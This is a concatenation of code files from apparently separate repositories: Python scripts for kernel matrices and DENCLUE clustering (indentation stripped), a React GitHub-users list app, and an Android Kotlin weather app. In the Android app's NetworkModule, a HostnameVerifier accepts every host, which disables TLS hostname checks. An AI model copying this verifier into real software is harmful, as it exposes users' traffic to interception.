plt.xlabel("X1: fLength")
plt.ylabel("X2: fWidth")
plt.show()
print("------------------------------")
#正态分布概率密度函数
u=Mean[0]
o2 = np.var(data[:,0])
o = np.std(data[:,0],ddof=1)
x = np.linspace(u - 4*o, u + 4*o, 100)
y = np.exp(-(x - u) ** 2 /(2* o **2))/(math.sqrt(2*math.pi)*o)
plt.plot(x, y, "b-", linewidth=1)
plt.grid(True)
plt.title("normal distribution(μ="+ str(round(u,3))+",σ^2 ="+str(round(o2,3))+")")
plt.xlabel("X1: fLength")
plt.ylabel("X2: f(x1)")
plt.show()
#方差最值
print("各个属性的方差:")
variance = np.var(data,axis=0)
print(variance)
print("第"+str(int(np.argmax(variance))+1)+"个属性的方差最大,为:"+str(np.max(variance)))
print("第"+str(int(np.argmin(variance))+1)+"个属性的方差最小,为:"+str(np.min(variance)))
print("------------------------------")
#协方差最值
a=data.T
covariance=np.cov(a)
print("协方差矩阵为:")
print(covariance)
u = np.triu(covariance,1) # 上三角矩阵
m1, n1 = divmod(np.argmax(u), 10)
m2, n2 = divmod(np.argmin(u), 10)
print("第"+str(m1+1)+"个属性和第"+str(n1+1)+"个属性的协方差最大,为:"+str(np.max(u)))
print("第"+str(m2+1)+"个属性和第"+str(n2+1)+"个属性的协方差最小,为:"+str(np.min(u)))<file_sep>import numpy as np
data = np.loadtxt("iris.txt",
usecols=(1,2,3,4),
unpack=False,
skiprows=1,
delimiter=' ')
m, n = data.shape
k = np.zeros((m,m))
for i in range(m):
for j in range(m):
k[i,j] = (np.dot(data[i],data[j]))**2
print("齐次二次核矩阵:")
print(k)
print("______________________________")
print("------------------------------")
a = np.eye(m) - np.ones((m,m)) / m
k_center = np.dot(np.dot(a,k),a)
print("中心化后的核矩阵:")
print (k_center)
print("______________________________")
print("------------------------------")
b = np.zeros((m,m))
for i in range(m):
b[i,i] = 1 / (k[i,i]**0.5)
k_normalize = np.dot(np.dot(b,k),b)
print("标准化后的核矩阵:")
print(k_normalize)
print("______________________________")
print("------------------------------")
p_fs = np.zeros((m,10))
for i in range(m):
for j in range(n):
p_fs[i,j] = data[i,j]**2
for i1 in range(n-1):
for j1 in range(i1+1,n):
j = j + 1
p_fs[i,j] = 2**0.5 * data[i,i1] * data[i,j1]
print("变换到特征空间的点:")
print(p_fs)
print("______________________________")
print("------------------------------")
m1,n1 = p_fs.shape
p_center = np.zeros((m1,n1))
for i in range(n1):
p_center[:,i] = p_fs[:,i] - np.mean(p_fs[:,i])
print("特征空间点的中心化:")
print(p_center)
print("______________________________")
print("------------------------------")
p_normalize = np.zeros((m1,n1))
for i in range(m):
p_normalize[i] = p_fs[i] / np.linalg.norm(p_fs[i])
print("特征空间点的标准化")
print(p_normalize)
print("______________________________")
print("------------------------------")
k_center1 = np.zeros((m,m))
for i in range(m):
for j in range(m):
k_center1[i,j] = np.dot(p_center[i],p_center[j])
print("用中心化特征空间的点计算中心化核矩阵:")
print(k_center1)
print("______________________________")
print("------------------------------")
k_normalize1 = np.zeros((m,m))
for i in range(m):
for j in range(m):
k_normalize1[i,j] = np.dot(p_normalize[i],p_normalize[j])
print("用标准化特征空间的点计算标准化核矩阵:")
print(k_normalize1)
<file_sep># Python
data mining
iris.txt 为鸢尾花数据集
magic1.txt 为伽马望远镜数据集
<file_sep># coding=utf-8
import numpy as np
import math
import copy
def kernelize(x,y,h,degree):
kernel = np.exp(-(np.linalg.norm(x - y) / h) ** 2 / 2) / ((2. * np.pi) ** (degree/2))
return kernel
def density(x,data,h,degree):
m=0
for i in range(len(data)):
m = m + kernelize(x,data[i],h,degree)
d = m / (len(data) * h**degree)
return d
def den_arrive(x,y):
a=[]
b=[]
d = 0.3
if len(x)!=1 and len(x)!=0 :
for i in range(1,len(x)):
distance = math.sqrt((x[0][0]-x[i][0])**2+(x[0][1]-x[i][1])**2)
if distance <= d:
a.append(x[i])
else:
b.append(x[i])
a.append(x[0])
aa=copy.deepcopy(a)
bb=copy.deepcopy(b)
for i in range(len(aa)-1):
for j in range(len(bb)):
distance = math.sqrt((aa[i][0]-bb[j][0])**2+(aa[i][1]-bb[j][1])**2)
if distance <= d:
a.append(bb[j])
b.remove(bb[j])
elif len(x)==1:
a = x
elif len(x)==0:
return
y.append(a)
den_arrive(b,y)
return y
#计算X(t+1)
def next_step(d, data, h):
m, n = data.shape
xx = np.zeros((1, n))
W = np.ones((m, 1))
w = 0
for i in range(m):
k = kernelize(d, data[i], h, n)
k= k * W[i] / (h ** n)
w = w + k
xx = xx + (k * data[i])
xx = xx / w
a = w / np.sum(W)
return [xx, a]
def find_attractor(d, D, h, e):
x1 = np.copy(d)
b = 0
while True:
x0 = np.copy(x1)
x1, a = next_step(x0, D, h)
ee = a - b
b = a
if ee < e:
break
return x1[0]
def Denclue(data,min,e,h):
m, n = data.shape
attractor = [] #存放密度吸引子
point = {} #到吸引子的点
for i in range(m):
den_attractor = find_attractor(data[i],data,h,e)
Density = density(den_attractor,data,h,n)
if Density >= min:
if ",".join('%s' % x for x in den_attractor) in point:
p = point[",".join('%s' % x for x in den_attractor)]
p.append(data[i].tolist())
point[",".join('%s' % x for x in den_attractor)] = p
else:
point[",".join('%s' % x for x in den_attractor)] = [data[i].tolist()]
den_attractor = den_attractor.tolist()
if den_attractor not in attractor:
attractor.append(den_attractor)
A = [] #分类后的密度吸引子
cluster_num = np.array(den_arrive(attractor,A))
print("总计分为"+str(len(cluster_num))+"个簇")
a = 0
for i in range(len(cluster_num)):
num = 0
for j in range(len(cluster_num[i])):
num = num + len(point[",".join('%s' % x for x in cluster_num[i][j])])
a = a + num
print("第"+str(i+1)+"个簇的大小为:"+str(num))
print("--------------------------------")
Point={} #最终到吸引子的点
for i in range(len(cluster_num)):
attractor_s=[] #在一起的密度吸引子
for j in range(len(cluster_num[i])):
c = point[",".join('%s' % x for x in cluster_num[i][j])]
for k in range(len(c)):
attractor_s.append(c[k])
Point[",".join('%s' % x for x in cluster_num[i][0])] = attractor_s
for i in range(len(cluster_num)):
print("第"+str(i+1)+"个簇的密度吸引子为:")
for j in range(len(cluster_num[i])):
print(cluster_num[i][j],end=" ")
if (j+1) % 3 ==0:
print("")
print("")
print("该簇中的一组点为:" )
g = Point[",".join('%s' % x for x in cluster_num[i][0])]
for j in range(len(g)):
print(g[j],end=" ")
if (j+1) % 10 ==0:
print("")
print("")
print("--------------------------------")
C_point = [] #分类后的点
for i in range(len(cluster_num)):
C_point1 = Point[",".join('%s' % id for id in A[i][0])]
C_point.append(C_point1)
right_num = 0
for i in range(len(C_point)):
num_setosa = 0
num_versicolor = 0
num_virginica =0
for j in range(len(C_point[i])):
seq=data.tolist().index(C_point[i][j]) + 1
if data1[seq][2]=="setosa":
num_setosa += 1
elif data1[seq][2]=="versicolor":
num_versicolor += 1
elif data1[seq][2]=="virginica":
num_virginica += 1
right_num = right_num + max(num_setosa,num_versicolor,num_virginica)
p = right_num / a
print("聚类的纯度为:"+str(p))
data = np.loadtxt("iris.txt",
usecols=(1, 2),
unpack=False,
skiprows=1,
delimiter=' ')
data1 = np.loadtxt("iris.txt",
dtype=str,
usecols=(5),
unpack=False,
skiprows=1,
delimiter=' ')
data1 = np.c_[data,data1]
Denclue(data, 0.3, 0.0001, 0.15) #第二个参数为最小密度,第三个参数为收敛公差,第四个参数为带宽
|
5725f260e3331b0e0e31166f1356198f7f315b82
|
[
"Markdown",
"Python"
] | 5
|
Python
|
Hello430000/Python
|
6976ce5b75b26634bc6d7abe4fb04c728317c086
|
b2d64d3698d790270081a401281de3fdc1b163fd
|
refs/heads/master
|
<repo_name>19narek97/github-users-list<file_sep>/src/view/Users/Users.js
import React from "react";
import {Col, Row} from "react-bootstrap";
import "./Users.css"
import UsersList from "./UsersList";
import Skeleton from "antd/es/skeleton";
import {Input} from "antd";
import FormUser from "./FormUser";
import Button from "antd/es/button";
import View from "./viewUser";
class Users extends React.Component {
constructor(props) {
super(props);
this.state = {
isLoadingUsers: false,
currentPage: 1,
data: [],
entry: {},
filterText:null,
unfilteredData:[]
}
}
componentDidMount() {
this.setState({
isLoadingUsers: true
}, () => fetch("https://api.github.com/users", {
method: 'get',
headers: {
Accept: 'application/json',
},
}).then((response) => {
if (response.status >= 200 && response.status < 300) {
return response.json();
} else {
const error = new Error(`HTTP Error ${response.statusText}`);
error.status = response.statusText;
error.response = response;
throw error;
}
}).then((data) => {
this.setState({
isLoadingUsers: false,
data: [...data]
})
}))
}
onModalClose = () => {
this.setState({
entry:{}
},() => this.props.history.push("/users"))
}
onModalSubmit = (user) => {
let {data} = this.state;
if (user.id) {
let newData = data.map((el) => {
if (el.id === user.id) {
return Object.assign({}, el, {
...user
});
} else {
return el;
}
})
this.setState({
data: [...newData]
}, () => this.props.history.push("/users"))
} else {
if(user.avatar_url === undefined){
user.avatar_url = "https://www.web2present.com/wp-content/uploads/2017/02/no-avatar-350x350.jpg"
}
data.unshift(user);
this.setState({
data
},() => this.props.history.push("/users"))
}
}
setUnfilteredData = (data) => {
if (!this.state.unfilteredData.length > 0) {
const copy = Object.assign([], data);
this.setState({unfilteredData: copy});
}
}
onChangeSearch = (e) => {
this.setState({
filterText:e.target.value
},() => this.filterData())
}
filterData = () => {
let {data,unfilteredData,filterText} = this.state;
this.setState({
isLoadingUsers:true
})
this.setUnfilteredData(data)
function matchesText(item) {
return item.login ? item.login.toLowerCase().includes(filterText.toLowerCase()) : false;
}
let dataToFilter = unfilteredData ? unfilteredData : data
let filteredData = dataToFilter
.filter(matchesText);
this.setState({
data:[...filteredData],
isLoadingUsers:false
})
}
addNewUser = () => {
this.setState({
entry:{
login: "",
url: "",
followers_url: "",
following_url: "",
starred_url: "",
subscriptions_url: "",
}
}, () => this.props.history.push(`users/create`))
}
handelDelete = (id) => {
let {data} = this.state,
users = [...data];
let filteredData = users.filter(el => +el.id !== +id);
this.setState({
data: [...filteredData]
})
}
onView = (id) => {
let {data} = this.state,
entry = data.find(({id: UserId}) => +UserId === +id);
this.setState({
entry
}, () => this.props.history.push(`users/${id}/view`))
}
handelEdit = (id) => {
let {data} = this.state,
entry = data.find(({id: UserId}) => +UserId === +id);
this.setState({
entry
}, () => this.props.history.push(`users/${id}/edit`))
}
render() {
let {isLoadingUsers, data, currentPage, entry} = this.state;
return (
<Row>
{
isLoadingUsers ? <Skeleton active/> :
<Col>
<Row>
<Col/>
<Col/>
<Col>
<Button type="primary" onClick={this.addNewUser} className="mt-3 float-right" htmlType="button">
Add New User
</Button>
</Col>
<Col>
<Input type="text" className="mt-3" placeholder="Search" onChange={this.onChangeSearch}/>
</Col>
</Row>
<View entry={entry} onClose={this.onModalClose}/>
<FormUser entry={entry} onClose={this.onModalClose} onSubmit={this.onModalSubmit}/>
<UsersList
onView={this.onView}
onDelete={this.handelDelete}
onEdit={this.handelEdit}
currentPage={currentPage}
data={data}
/>
</Col>
}
</Row>
)
}
}
export default Users<file_sep>/src/components/layouts/UserLayout.js
import React from "react";
import {Container, Row} from "react-bootstrap"
import Navbar from "react-bootstrap/Navbar";
import Nav from "react-bootstrap/Nav";
import {Link} from "react-router-dom"
class UserLayout extends React.Component {
render() {
const {children} = this.props;
return (
<Container fluid={true}>
<Row style={{display: 'block'}}>
<Navbar bg="light" expand='md'>
<Navbar.Brand href="/users">Users</Navbar.Brand>
<Navbar.Collapse id="basic-navbar-nav">
<Nav className="mr-auto">
<Link style={{marginTop: '6px'}} to={"/users"}>Users List</Link>
</Nav>
</Navbar.Collapse>
</Navbar>
</Row>
{children}
</Container>
)
}
}
export default UserLayout<file_sep>/src/view/Users/RenderListUsers.js
import React from "react";
import {Button, Card, Popconfirm} from "antd";
import Divider from "antd/es/divider";
import { withRouter } from "react-router";
function RenderListUsers(props) {
return props.dataUsers.map((item) => {
return (
<Card
bordered={true}
className="mt-3"
key={+item.id * Math.random()}
hoverable
style={{width: 270}}
cover={<img alt="example" src={item.avatar_url}/>}
>
<Divider/>
<div className="emailSetupInfo">
<span className="labelUserInfo">Login: <strong>{item.login}</strong></span> <br/>
<span className="labelUserInfo">Url: <a href={item.url} target="_blank"><strong>{item.url.length > 26 ? item.url.slice(0,26) + "..." : item.url}</strong></a> </span>
</div>
<Button
type="primary"
className="mt-4 mr-2"
disabled={false}
onClick={() => props.onView(item.id)}
>
View
</Button>
<Button
type="primary"
className="mt-4 mr-2"
disabled={false}
onClick={() => props.onEdit(item.id)}
>
Edit
</Button>
<Popconfirm title="Confirm delete" onConfirm={() => props.onDelete(item.id)}>
<Button
type="danger"
className="mt-4 deleteBtn"
disabled={false}
>
Delete
</Button>
</Popconfirm>
</Card>
)
})
}
export default withRouter(RenderListUsers)<file_sep>/src/view/Users/viewUser.js
import React from "react";
import Button from "antd/es/button";
import Modal from "antd/es/modal";
import {withRouter} from "react-router";
class View extends React.Component {
onClose = () => {
const {onClose} = this.props;
onClose()
}
render() {
let {match, entry} = this.props,
{action} = match.params,
isVisible = /^(view)$/i.test(action);
return (
<Modal
title={"View"}
width={1024}
visible={isVisible}
footer={null}
onCancel={this.onClose}
>
<div>
<span style={{fontSize:"34px"}}>Login ` </span> <strong style={{fontSize:"21px"}}>{entry.login}</strong><br/>
<span style={{fontSize:"34px"}}>Url ` <a href={entry.url} target="_blank"><strong style={{fontSize:"21px"}}>{entry.url}</strong></a> </span><br/>
<span style={{fontSize:"34px"}}>Followers Url ` <a href={entry.followers_url} target="_blank"><strong style={{fontSize:"21px"}}>{entry.followers_url}</strong></a> </span><br/>
<span style={{fontSize:"34px"}}>Following Url ` <a href={entry.following_url} target="_blank"><strong style={{fontSize:"21px"}}>{entry.following_url}</strong></a> </span><br/>
<span style={{fontSize:"34px"}}>starred Url ` <a href={entry.starred_url} target="_blank"><strong style={{fontSize:"21px"}}>{entry.starred_url}</strong></a> </span><br/>
<span style={{fontSize:"34px"}}>Subscriptions Url ` <a href={entry.subscriptions_url} target="_blank"><strong style={{fontSize:"21px"}}>{entry.subscriptions_url}</strong></a> </span>
</div>
<div className="modal-footer">
<Button type="primary" onClick={this.onClose}>Okay</Button>
</div>
</Modal>
)
}
}
export default withRouter(View)<file_sep>/src/components/rootComponent/RootComponent.js
import React from "react";
import { Redirect } from "react-router-dom";
import { withRouter } from "react-router";
const RootComponent = (props) => {
return (
<div>{ <Redirect to={'/users'}/> }</div>
)
}
export default withRouter(RootComponent)<file_sep>/src/routers.js
import React from "react";
import {Switch} from 'react-router'
import AppRouter from './components/AppRouter/AppRouter'
import UserLayout from "./components/layouts/UserLayout";
import Users from "./view/Users"
import RootComponent from "./components/rootComponent/RootComponent";
class Routers extends React.Component {
render() {
return (
<div>
<Switch>
<AppRouter exact path={'/'} layout={UserLayout} component={RootComponent}/>
<AppRouter exact path={'/users'} layout={UserLayout} component={Users}/>
<AppRouter path="/users/:id(\d+)?/:action([a-z]+)?" layout={UserLayout} component={Users} exact />
</Switch>
</div>
)
}
}
export default Routers
|
9ea4cae4843dada98ffe9b8557846dde9301940c
|
[
"JavaScript"
] | 6
|
JavaScript
|
19narek97/github-users-list
|
4d36b51e22494adb16d40e2e8295f8a67f0cd3fb
|
8659f63d0f5a264f6bad88b962d0c7a6540f5c73
|
refs/heads/master
|
<repo_name>GeetanjaliNaik/WeatherApp<file_sep>/app/src/main/java/com/geeta/weatherapp/data/weather/LocationModel.kt
package com.geeta.weatherapp.data.weather
import androidx.room.Entity
import androidx.room.PrimaryKey
@Entity(tableName = "locationData")
data class LocationModel(@PrimaryKey
var longitude: Double, var latitude: Double)<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/viewmodel/WeatherViewModel.kt
package com.geeta.weatherapp.ui.viewmodel
import android.annotation.SuppressLint
import android.app.Application
import android.content.Context
import android.content.Context.LOCATION_SERVICE
import android.location.Geocoder
import android.location.Location
import android.location.LocationManager
import androidx.lifecycle.MutableLiveData
import androidx.lifecycle.ViewModel
import com.geeta.weatherapp.R
import com.geeta.weatherapp.WeatherApplication
import com.geeta.weatherapp.api.datamanager.WeatherDataManager
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.data.weather.WeatherModel
import com.geeta.weatherapp.database.repositry.WeatherDbRepository
import com.geeta.weatherapp.utils.AppData
import com.geeta.weatherapp.utils.CommonResponseParser
import com.geeta.weatherapp.utils.unixTimestampToTimeString
import com.google.android.gms.location.FusedLocationProviderClient
import com.google.android.gms.location.LocationRequest
import com.google.android.gms.location.LocationServices
import io.reactivex.Observable
import io.reactivex.android.schedulers.AndroidSchedulers
import io.reactivex.schedulers.Schedulers
import java.io.IOException
import java.lang.Exception
import java.util.*
import java.util.concurrent.TimeUnit
import javax.inject.Inject
class WeatherViewModel @Inject constructor(val application: Application) : ViewModel() {
@Inject
lateinit var weatherDataManager: WeatherDataManager
@Inject
lateinit var appData: AppData
val progressBarLiveData = MutableLiveData<Boolean>()
var weatherData= MutableLiveData<WeatherModel>()
val weatherInfoFailureLiveData = MutableLiveData<String>()
val locationDetail=MutableLiveData<LocationModel>()
fun getWeather()
{
getWeatherData()
}
@SuppressLint("CheckResult")
private fun getWeatherData(){
progressBarLiveData.postValue(true)
try{
WeatherDbRepository.invoke(application).weatherDataDao().getDate()
.subscribeOn(Schedulers.newThread())
.observeOn(AndroidSchedulers.mainThread())
.subscribe(
{result->
if(result==null|| result.isEmpty()){
getCurrentweather()
progressBarLiveData.postValue(false)
}
else{
progressBarLiveData.postValue(false)
val times=result[0].toLong()*1000
if(((System.currentTimeMillis()-times)/3600000)>2)
getCurrentweather()
else
getWeatherFromDB()
}
}
, {error->
weatherInfoFailureLiveData.postValue( application.getString(R.string.unable_to_get_weather_update))
progressBarLiveData.postValue(false)
})
}
catch (e:Exception)
{
weatherInfoFailureLiveData.postValue( application.getString(R.string.unable_to_get_weather_update))
progressBarLiveData.postValue(false)
}
}
@SuppressLint("CheckResult")
private fun getWeatherFromDB()
{
progressBarLiveData.postValue(true)
WeatherDbRepository.invoke(application).weatherDataDao().getWeather()
.subscribeOn(Schedulers.newThread())
.observeOn(AndroidSchedulers.mainThread())
.subscribe(
{result->
weatherData.postValue(result)
progressBarLiveData.postValue(false)
}
, {error->
weatherInfoFailureLiveData.postValue( CommonResponseParser.ErrorParser.parseError(error, true))
progressBarLiveData.postValue(false)
})
}
@SuppressLint("CheckResult")
fun getCurrentweather()
{
progressBarLiveData.postValue(true)
WeatherDbRepository.invoke(application).locationDataDao().getLocation()
.subscribeOn(Schedulers.newThread())
.flatMap { result->
if(result==null|| result.isEmpty())
throw Throwable(application.getString(R.string.unable_fatch_data))
else
return@flatMap weatherDataManager.updateWeather(result[0].latitude,result[0].longitude)
}
.map{result->
var weatherDataDao=WeatherDbRepository.invoke(application).weatherDataDao()
weatherDataDao.deleteAll()
weatherDataDao.insertWeather(result)
return@map result
}
.observeOn(AndroidSchedulers.mainThread())
.subscribe(
{result->
// WeatherDbRepository.invoke(application).weatherDataDao().insert(result)
weatherData.postValue(result)
progressBarLiveData.postValue(false)
}
, {error->
weatherInfoFailureLiveData.postValue( CommonResponseParser.ErrorParser.parseError(error, true))
progressBarLiveData.postValue(false)
})
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/api/BaseApiManager.kt
package com.geeta.weatherapp.api
import com.geeta.weatherapp.api.services.WeatherService
import retrofit2.Retrofit
import javax.inject.Inject
import javax.inject.Singleton
/**
* Created by Geetanjali on 16/01/18.
*/
@Singleton
class BaseApiManager @Inject constructor(private var retrofit: Retrofit) {
lateinit var weatherService: WeatherService
private fun initApiManager() {
weatherService = create(WeatherService::class.java)
}
fun <T> create(serviceClass: Class<T>): T {
return retrofit.create(serviceClass)
}
init {
initApiManager()
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/network/NetworkModule.kt
package com.geeta.weatherapp.network
import com.facebook.stetho.okhttp3.StethoInterceptor
import com.geeta.weatherapp.BuildConfig
import com.geeta.weatherapp.api.APIRestConstant
import com.geeta.weatherapp.api.BaseApiManager
import com.geeta.weatherapp.utils.AppData
import com.google.gson.Gson
import com.google.gson.GsonBuilder
import com.jakewharton.retrofit2.adapter.rxjava2.RxJava2CallAdapterFactory
import dagger.Module
import dagger.Provides
import dagger.android.AndroidInjectionModule
import okhttp3.OkHttpClient
import okhttp3.logging.HttpLoggingInterceptor
import retrofit2.Retrofit
import retrofit2.converter.gson.GsonConverterFactory
import retrofit2.converter.scalars.ScalarsConverterFactory
import java.util.concurrent.TimeUnit
import javax.inject.Inject
import javax.inject.Singleton
import javax.net.ssl.HostnameVerifier
/*
* Created by Geetanjali on 09/01/18.
*/
@Module(includes = arrayOf(AndroidInjectionModule::class))
class NetworkModule @Inject constructor() {
private val HTTP_CONNECTION_TIMEOUT = 1200 // Seconds
private val HTTP_READ_TIMEOUT = 1200 // Seconds
@Provides
@Singleton
internal fun provideHostnameVerifier(): HostnameVerifier {
return HostnameVerifier { hostname, session -> true }
}
@Provides
@Singleton
internal fun provideOkHttpClient(interceptor: HttpLoggingInterceptor, hostnameVerifier: HostnameVerifier): OkHttpClient {
val builder = OkHttpClient.Builder()
builder.hostnameVerifier(hostnameVerifier)
builder.connectTimeout(HTTP_CONNECTION_TIMEOUT.toLong(), TimeUnit.SECONDS)
builder.readTimeout(HTTP_READ_TIMEOUT.toLong(), TimeUnit.SECONDS)
builder.addInterceptor(interceptor)
/* if (BuildConfig.DEBUG) {
builder.addNetworkInterceptor(StethoInterceptor());
}*/
builder.addInterceptor(ErrorInterceptor())
return builder.build()
}
@Provides
@Singleton
internal fun provideHttpLoggingInterceptor(): HttpLoggingInterceptor {
val logger = HttpLoggingInterceptor()
logger.level = HttpLoggingInterceptor.Level.BODY
return logger
}
@Provides
@Singleton
internal fun provideGson(): Gson {
return GsonBuilder().setLenient().setDateFormat(
"yyyy-MM-dd'T'HH:mm:ss.sssZ").create()
}
@Provides
@Singleton
internal fun provideRetrofit(gson: Gson, okHttpClient: OkHttpClient): Retrofit {
return Retrofit.Builder().baseUrl(APIRestConstant.BASE_API_URL).client(okHttpClient).addConverterFactory(
ScalarsConverterFactory.create()).addConverterFactory(
GsonConverterFactory.create(gson)).addCallAdapterFactory(
RxJava2CallAdapterFactory.create()).build()
}
/*@Provides
@Singleton
internal fun provideRxBus(): RxBus {
return RxBus()
}*/
@Provides
@Singleton
internal fun provideAppData(): AppData {
return AppData()
}
@Provides
@Singleton
internal fun provideBaseApiManager(retrofit: Retrofit):BaseApiManager
{
return BaseApiManager(retrofit)
}
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/viewmodel/WeatherViewModelFactory.kt
package com.geeta.weatherapp.ui.viewmodel
import android.app.Application
import android.content.Context
import androidx.lifecycle.ViewModel
import androidx.lifecycle.ViewModelProvider
import javax.inject.Inject
import javax.inject.Provider
import javax.inject.Singleton
@Singleton
class WeatherViewModelFactory @Inject constructor(private val context: Application): ViewModelProvider.Factory {
override fun <T : ViewModel> create(modelClass: Class<T>): T {
return if (modelClass.isAssignableFrom(WeatherViewModel::class.java!!)) {
WeatherViewModel(context) as T
}
else if (modelClass.isAssignableFrom(LocationViewModel::class.java!!))
{
LocationViewModel(context) as T
}
else {
throw IllegalArgumentException("ViewModel Not Found")
}
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/module/AppViewModule.kt
package com.geeta.weatherapp.injection.module
import androidx.lifecycle.ViewModel
import androidx.lifecycle.ViewModelProvider
import com.geeta.weatherapp.api.BaseApiManager
import com.geeta.weatherapp.injection.scopes.ViewModelKey
import com.geeta.weatherapp.ui.viewmodel.LocationViewModel
import com.geeta.weatherapp.ui.viewmodel.WeatherViewModel
import com.geeta.weatherapp.ui.viewmodel.WeatherViewModelFactory
import dagger.Binds
import dagger.Module
import dagger.multibindings.IntoMap
@Module
abstract class AppViewModule {
/*
* inject this object into a Map using the @IntoMap annotation,
* with the WeatherViewModel.class as key,
* and a Provider that will build a WeatherViewModel
* object.
*
* */
@Binds
@IntoMap
@ViewModelKey(WeatherViewModel::class)
abstract fun currentWeatherViewModel(weatherViewModel: WeatherViewModel?): ViewModel?
@Binds
abstract fun bindWeatherViewModelFactory(factory: WeatherViewModelFactory?): ViewModelProvider.Factory?
@Binds
@IntoMap
@ViewModelKey(LocationViewModel::class)
abstract fun currentLocationViewModel(locationViewModel: LocationViewModel?): ViewModel?
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/api/services/WeatherService.kt
package com.geeta.weatherapp.api.services
import com.geeta.weatherapp.api.APIRestConstant
import com.geeta.weatherapp.data.weather.WeatherModel
import io.reactivex.Observable
import retrofit2.http.*
interface WeatherService {
// @GET(APIRestConstant.GET_WEATHER)
// abstract fun getCurrentWeatherAddress(@Query("q") lat: String, @Query("appid") appKey: String): Observable<WeatherModel>
@GET(APIRestConstant.GET_WEATHER)
abstract fun getCurrentWeather(@Query("lat") lat: Double, @Query("lon") lon: Double, @Query("appid") appKey: String): Observable<WeatherModel>
}<file_sep>/app/build.gradle
apply plugin: 'com.android.application'
apply plugin: 'kotlin-android'
apply plugin: 'kotlin-kapt'
apply plugin: 'kotlin-android-extensions'
android {
compileSdkVersion 29
buildToolsVersion "29.0.3"
defaultConfig {
applicationId "com.geeta.weatherapp"
minSdkVersion 21
targetSdkVersion 29
versionCode 1
versionName "1.0"
testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner"
buildConfigField "String", "BASE_URL", "\"" + getBaseUrl() + "\""
buildConfigField "String", "APP_ID", "\"" + getAppId() + "\""
}
compileOptions {
sourceCompatibility JavaVersion.VERSION_1_8
targetCompatibility JavaVersion.VERSION_1_8
}
buildTypes {
release {
minifyEnabled false
proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
}
}
dataBinding {
enabled = true
}
testOptions {
unitTests.returnDefaultValues = true
}
}
kapt {
correctErrorTypes true
}
ext {
daggerVersion = '2.26'
stethoVersion = '1.5.0'
retrofitVersion = '2.7.1'
okHttpVersion = '4.4.0'
rxAndroidVersion = '2.0.1'
rxJavaVersion = '2.1.6'
multidexVersion='1.0.3'
room_version = "2.2.4"
}
dependencies {
implementation fileTree(dir: 'libs', include: ['*.jar'])
implementation "org.jetbrains.kotlin:kotlin-stdlib-jdk7:$kotlin_version"
implementation 'androidx.appcompat:appcompat:1.1.0'
implementation 'androidx.core:core-ktx:1.0.2'
implementation 'androidx.constraintlayout:constraintlayout:1.1.3'
testImplementation 'junit:junit:4.12'
androidTestImplementation 'androidx.test.ext:junit:1.1.1'
androidTestImplementation 'androidx.test.espresso:espresso-core:3.2.0'
//daggger
implementation "com.google.dagger:dagger:$daggerVersion"
kapt "com.google.dagger:dagger-compiler:$daggerVersion"
kapt "com.google.dagger:dagger-android-processor:$daggerVersion"
implementation "com.google.dagger:dagger-android:$daggerVersion"
implementation "com.google.dagger:dagger-android-support:$daggerVersion"
// Retrofit
implementation "com.squareup.retrofit2:retrofit:$retrofitVersion"
implementation "com.squareup.retrofit2:retrofit-converters:$retrofitVersion"
implementation "com.squareup.retrofit2:converter-gson:$retrofitVersion"
implementation "com.squareup.okhttp3:okhttp:$okHttpVersion"
implementation "com.squareup.okhttp3:logging-interceptor:$okHttpVersion"
implementation "com.squareup.retrofit2:converter-jackson:${retrofitVersion}"
implementation 'com.squareup.retrofit2:converter-scalars:2.1.0'
implementation 'com.jakewharton.retrofit:retrofit2-rxjava2-adapter:1.0.0'
//Rxjava and RxAndroid
implementation "io.reactivex.rxjava2:rxandroid:$rxAndroidVersion"
implementation "io.reactivex.rxjava2:rxjava:$rxJavaVersion"
//MultiDex
implementation "com.android.support:multidex:$multidexVersion"
implementation 'com.facebook.stetho:stetho-okhttp3:1.5.0'
implementation 'com.google.android.gms:play-services-location:17.0.0'
implementation 'androidx.lifecycle:lifecycle-viewmodel-ktx:2.2.0'
implementation 'com.google.android.material:material:1.2.0-alpha05'
//room
implementation "androidx.room:room-runtime:$room_version"
kapt "androidx.room:room-compiler:$room_version" // For Kotlin use kapt instead of annotationProcessor
// implementation "androidx.room:room-ktx:$room_version"
implementation "androidx.room:room-rxjava2:$room_version"
// testImplementation "androidx.room:room-testing:$room_version"
// implementation "com.google.android.material:material:$material_version"
implementation "android.arch.work:work-runtime:1.0.1"
testImplementation 'org.mockito:mockito-inline:2.11.0'
implementation 'androidx.work:work-rxjava2:2.3.4'
//Stetho
implementation "com.facebook.stetho:stetho-okhttp3:$stethoVersion"
debugImplementation "com.facebook.stetho:stetho:$stethoVersion"
debugImplementation "com.facebook.stetho:stetho-okhttp3:$stethoVersion"
}
def getBaseUrl() {
Properties properties = new Properties()
properties.load(project.rootProject.file('local.properties').newDataInputStream())
String baseUrl = properties.getProperty("base_url")
if(baseUrl==null)
throw new GradleException("Add 'base_url' field at local.properties file. For more details: https://github.com/hasancse91/weather-app-android-mvvm/blob/master/README.md")
return baseUrl
}
def getAppId() {
Properties properties = new Properties()
properties.load(project.rootProject.file('local.properties').newDataInputStream())
String appId = properties.getProperty("app_id")
if(appId==null)
throw new GradleException("Add 'app_id' field at local.properties file. For more details: https://github.com/hasancse91/weather-app-android-mvvm/blob/master/README.md")
return appId
}<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/module/DataBaseModule.kt
package com.geeta.weatherapp.injection.module
import android.app.Application
import android.content.Context
import androidx.room.Room
import com.geeta.weatherapp.database.WeatherDataBase
import com.geeta.weatherapp.database.WeatherDataDao
import com.geeta.weatherapp.database.repositry.LocationDataDao
import com.geeta.weatherapp.database.repositry.WeatherDbRepository
import com.geeta.weatherapp.database.repositry.WeatherDbRepositoryLis
import com.geeta.weatherapp.injection.scopes.ApplicationContext
import com.geeta.weatherapp.injection.scopes.PerApplication
import dagger.Module
import dagger.Provides
import dagger.android.AndroidInjectionModule
import javax.inject.Singleton
@Module(includes = arrayOf(AndroidInjectionModule::class))
class DataBaseModule() {
